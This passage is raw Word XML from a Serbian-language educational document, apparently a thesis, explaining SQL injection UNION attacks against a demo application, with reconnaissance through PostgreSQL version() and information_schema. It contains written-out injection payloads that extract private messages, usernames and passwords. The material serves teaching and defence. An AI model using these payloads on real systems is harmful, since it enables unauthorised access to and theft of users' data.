        <w:t xml:space="preserve"> SQLi napada proširiti originalni upit radi preuzimanja podataka iz neke druge tabele, potrebno je imati u vidu kog tipa su ti podaci koje će definisan podupit vratiti. Najčešće su u pitanju stringovi, te je potrebno naći koja kolona iz originalnog upita sadrži string-kompatibilne podatke. Pokomponentno poklapanje tipova podataka kolona između originalnog upita i podupita definisanog malicioznim payload-om je neophodno zbog uslova spomenutih na početku ovog poglavlja, jer u suprotnom neće biti moguće upite povezati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operatorom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">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je ustanovljen broj kolona koje vraća upit, moguće je iskoristiti payload koji sadrži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operator i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parametre tako što se redom, po jedan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parametar zameni proizvoljnim stringom, vidljivo na slici 9:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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991" cy="1709738"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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153991"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9 - Određivanje kompatibilnih tipova podataka između kolona</w:t>
      </w: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se proizvoljan string stavi na poziciji prvog ili drugog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parametra, dolazi do greške u izvršenju upita zato što originalan upit na tim pozicijama sadrži po ceo broj.</w:t>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bi se proizvoljan string stavio na poziciji trećeg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parametra, upit bi se uspešno izvršio jer originalan upit na toj poziciji sadrži string, konkretno korisničku ulogu (atribut </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">role </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">u ovom slučaju), vidljivo na slici 10:</w:t>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7788" cy="1925905"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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157788" cy="192590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10 - Određivanje kompatibilnih tipova podataka između kolona</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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Oba kriterijuma su zadovoljena: upiti između kojih se nalazi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operator sadrže isti broj kolona i kolone sadrže kompatibilne tipove, te je kao rezultat vidljiv dodatan red koji sadrži podatke bazirane na definisanom payload-u </w:t>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highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' OR '1'='1' UNION SELECT NULL,NULL,'Hello',NULL,NULL,NULL,NULL--</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uokvireno zelenim pravouganikom, gde je proizvoljan string </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ffffff"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="black"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'Hello'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> označen crvenom strelicom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x2w3dr6vofyh" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Primer - demonstracija UNION napada</w:t>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sistemu postoji funkcija koja za zadat šablon korisničkog imena prikazuje osnovne informacije o korisnicima iz tabele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vidljivo na slici 11:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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1095886"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="37"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919663" cy="109588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11 - Regularno ponašanje upita</w:t>
      </w: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Cilj ovog napada je preuzeti privatne poruke svakog korisnika iz tabele </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">messages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, koja sadrži atribute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id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Na prethodnoj slici je vidljivo da rezultat originalnog upita sadrži četiri kolone (</w:t>
      </w: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surname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), te je moguće iskoristiti payload </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000100">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UNION SELECT NULL,NULL,NULL,NULL FROM messages--</w:t>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čiji se efekat može videti na slici 12:</w:t>
      </w:r>
    </w:p>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1163" cy="1372791"/>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491163" cy="137279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12 - Formiranje unije</w:t>
      </w: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 kolona je poznat, ali je potrebno uskladiti tipove podataka između kolona dveju tabela. </w:t>
      </w:r>
    </w:p>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Obe tabele sadrže kolone koje se odnose na identifikatore, tj. cele brojeve, te je potrebno atribut </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> iz tabele </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">messages </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">postaviti na prvo mesto u payload-u, a zatim stringove </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b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zbog poklapanja sa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">username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kolonama iz tabele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Na kraju je u payload-u potrebno staviti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parametar da bi se ispoštovao uslov za broj kolona. Rezultujući payload je vidljiv na slici 13:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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0567" cy="2871788"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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220567"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13 - Konačan payload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Napad je uspešno izvršen i kao rezultat konačnog upita se javljaju podaci iz obe tabele: </w:t>
      </w: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messages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, gde su rezultati potonje uokvireni zelenim pravougaonikom na prethodnoj slici. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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izvršenja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upita, nazivi kolona se nasleđuju iz prvog podupita, u ovom slučaju iz tabele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Iako naveden slučaj nije to zahtevao, moguće je izvršiti konkatenaciju vrednosti iz više kolona neke tabele. Na primer, da je tabela </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">messages </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sadržala više od četiri kolone, moguće bi bilo povezati atribute simbolom za konkatenaciju (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Treba imati u vidu da simbol konkatenacije zavisi od tipa baze podataka, gde se na slici 14 može videti primer za PostgreSQL bazu podataka:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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1303" cy="2538413"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="42"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4611303"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14 - Konkatenacija</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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okviru rezultata, primećuje se da su atributi koji se odnose na </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b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body </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">spojeni operatorom konkatenacije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obeleženi zelenim pravougaonikom na prethodnoj slici.</w:t>
      </w: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Dodatan način na koji bi mogao da se proširi upit, tj. payload, se može odnositi na postavljanja </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>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uslova, gde bi se samo prikazivale poruke na osnovu konkretnog identifikatora korisnika, vidljivo na slici 15:</w:t>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6363" cy="1770345"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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186363" cy="177034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15 - Proširivanje upita </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">klauzulom</w:t>
      </w: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Takođe, treba napomenuti da je moguće koristiti istu tabelu na koju se odnosi originalan upit kako bi se dobili dodatni podaci, vidljivo na slici 16:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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0688" cy="1807117"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="40"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500688" cy="180711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16 - Korišćenje iste tabele pri formiranju unije</w:t>
      </w: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slučaju su podupitom vraćeni podaci o korisničkim imenima i lozinkama, u kombinaciji sa operatorima konkatenacije.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x7odfs3wae1g" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upiti za prikupljanje informacija o bazi podataka</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Upiti koji omogućuju prikupljanje dodatnih informacija o samoj bazi podataka, njenoj šemi i tabelama, kao i sličnim metapodacima koriste </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">napade kao osnovu.</w:t>
      </w:r>
    </w:p>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Kao što je slučaj sa operatorima i sintaksom koja se odnosi na konkatenaciju, način na koji će biti formirani upiti za prikupljanje metapodataka zavise od tipa baze podataka.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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nastavku će biti obrađeni primeri za PostgreSQL bazu podataka, gde će biti primenjeni </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> napadi nad upitom koji se odnosi na tabelu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iz poglavlja koji se odnosi na </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> napade.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wxcdhrg3e4a8" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verzija baze podataka</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Korišćenjem metode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> je moguće dobiti osnovne informacije o bazi podataka, vidljivo na slici 17:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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2722" cy="1191189"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="36"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612722" cy="119118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17 - Pregled verzije baze podataka</w:t>
      </w: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Pored verzije baze podataka, vidljivo je i na kojoj je platformi kompajlirana, kojim kompajlerom, kao i arhitektura sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_45k54pomyj8" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informacije o tabelama</w:t>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U okviru PostgreSQL baze podataka postoji skup pogleda (eng.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pod nazivom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information_schema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, koji može poslužiti napadaču da otkrije dodatne metapodatke o bazi podataka. Jedan pod pogleda koji se može naći jeste </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tables</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, unutar koga se nalaze sve tabele ciljane baze podataka, računajući i podrazumevane tabele koje postoje u svakoj PostgreSQL bazi podataka. Deo rezultata izvršenja ovakvog upita se može videti na slici 18:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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488" cy="1713493"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="26"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043488" cy="171349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18 - Pregled informacija o tabelama baze podataka</w:t>
      </w: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slici je vidljiv deo podrazumevanih tabela, kao i pojedine proizvoljne tabele </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">messages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profiles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, korišćene u prethodnim primerima. Ovakvi rezultati mogu biti korisni napadaču u fazi izviđanja, gde je potrebno otkriti što više informacija o ciljanom sistemu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Upit je moguće konkretizovati tako da prikazuje samo ručno kreirane tabele na sledeći način, kao na slici 19:</w:t>
      </w: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0713" cy="1470857"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="23"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00713" cy="147085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19 - Pregled informacija o korisnički-kreiranim tabelama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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Dodavanjem uslova za šemu tabele, u okviru rezultata su vidljive sve prethodno spomenute tabele: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
